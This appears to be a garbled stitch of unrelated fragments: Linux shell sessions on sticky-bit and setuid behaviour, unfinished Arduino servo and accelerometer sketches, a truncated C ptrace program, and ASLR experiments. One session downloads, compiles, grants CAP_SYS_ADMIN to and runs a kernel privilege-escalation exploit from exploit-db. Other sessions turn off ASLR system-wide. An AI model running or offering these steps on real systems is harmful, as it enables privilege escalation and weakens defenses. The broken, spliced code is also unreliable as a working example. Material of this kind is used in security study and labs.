
$ mkdir tmp
$ sudo chown root:root tmp # change owner to root
$ sudo chmod o+w tmp # give "other" users write permission on tmp, so they can create (and delete) entries in it
$
$ sudo mkdir tmp/123 # create a directory owned by root
$ sudo chmod 777 tmp/123 # give all permissions, so other user can remove it.
$ rm -r tmp/123 # remove it without any problem.
$
$ sudo mkdir tmp/123 # create a directory owned by root again
$ sudo chmod 777 tmp/123 # give all permissions, so other user can remove it.
$ which sudo
/usr/bin/sudo
$ cp /usr/bin/sudo ./ # copy sudo tool
$ sudo chown root:root sudo # change owner to root
$ ll
...
-rwxr-xr-x 1 root root 147872 2011-03-31 19:50 sudo*
$
$ ./sudo echo 1 # this will give an error: the copy has no setuid bit (mode above is -rwxr-xr-x)
sudo: must be setuid root
#include <Servo.h>
// Signal pin for the servo; per the original note, pick a pin with PWM capability.
constexpr int servo_pin{11};
// Servo object that setup() attaches to servo_pin.
Servo myservo;
void setup()
{
Serial.begin(9600);
myservo.attach(servo_pin);
$ wget http://www.exploit-db.com/download/15944
$ mv 15944 15944.c
$ gcc 15944.c -o exe # ignore warnings(if any)
$ # For more info search CAP_SYS_ADMIN in /usr/include/linux/capability.h
$ # Unfortunately, granting a file capability with setcap requires root privileges, hence the sudo
$ sudo setcap cap_sys_admin+ep ./exe
$ whoami
<your username (different from root)>
$ ./exe
[*] Testing Phonet support and CAP_SYS_ADMIN...
// Pin numbers for the x, y and z inputs (presumably analog channels; confirm against the wiring).
constexpr int xpin{0};
constexpr int ypin{1};
constexpr int zpin{2};
// Presumably the number of measurements to take; the identifier keeps its
// original spelling because code outside this excerpt may refer to it.
constexpr int measue_count{1000};
// Setup routine: starts the Serial port at 9600 baud.
void setup() {
    const int baud_rate = 9600;
    Serial.begin(baud_rate);
}
#include <stdio.h> // printf
#include <string.h> // strerror
#include <errno.h> // errno
#include <unistd.h> // execl
#include <sys/ptrace.h> // ptrace
#include <sys/user.h> // user_regs_struct
#include <sys/personality.h> // personality
int
main() {
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ strace -o 1 setarch x86_64 -R ls
1 2 a.out aslr.c
$ strace -o 2 setarch x86_64 ls
1 2 a.out aslr.c
$ diff 1 2
1c1
< execve("/usr/bin/setarch", ["setarch", "x86_64", "-R", "ls"], [/* 38 vars */]) = 0
---
> execve("/usr/bin/setarch", ["setarch", "x86_64", "ls"], [/* 38 vars */]) = 0
$ strace -o 1 setarch x86_64 -R ls
1 2 a.out aslr.c
$ strace -o 2 setarch x86_64 ls
1 2 a.out aslr.c
$ diff 1 2
...
a lot of differences
...
$ cat /proc/sys/kernel/randomize_va_space # see status of ASLR
2
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # disable ASLR system-wide; write the previous value (2 above) back when done
0
$ cat /proc/self/maps >1
$ cat /proc/self/maps >2
$ diff 1 2 # shows no difference again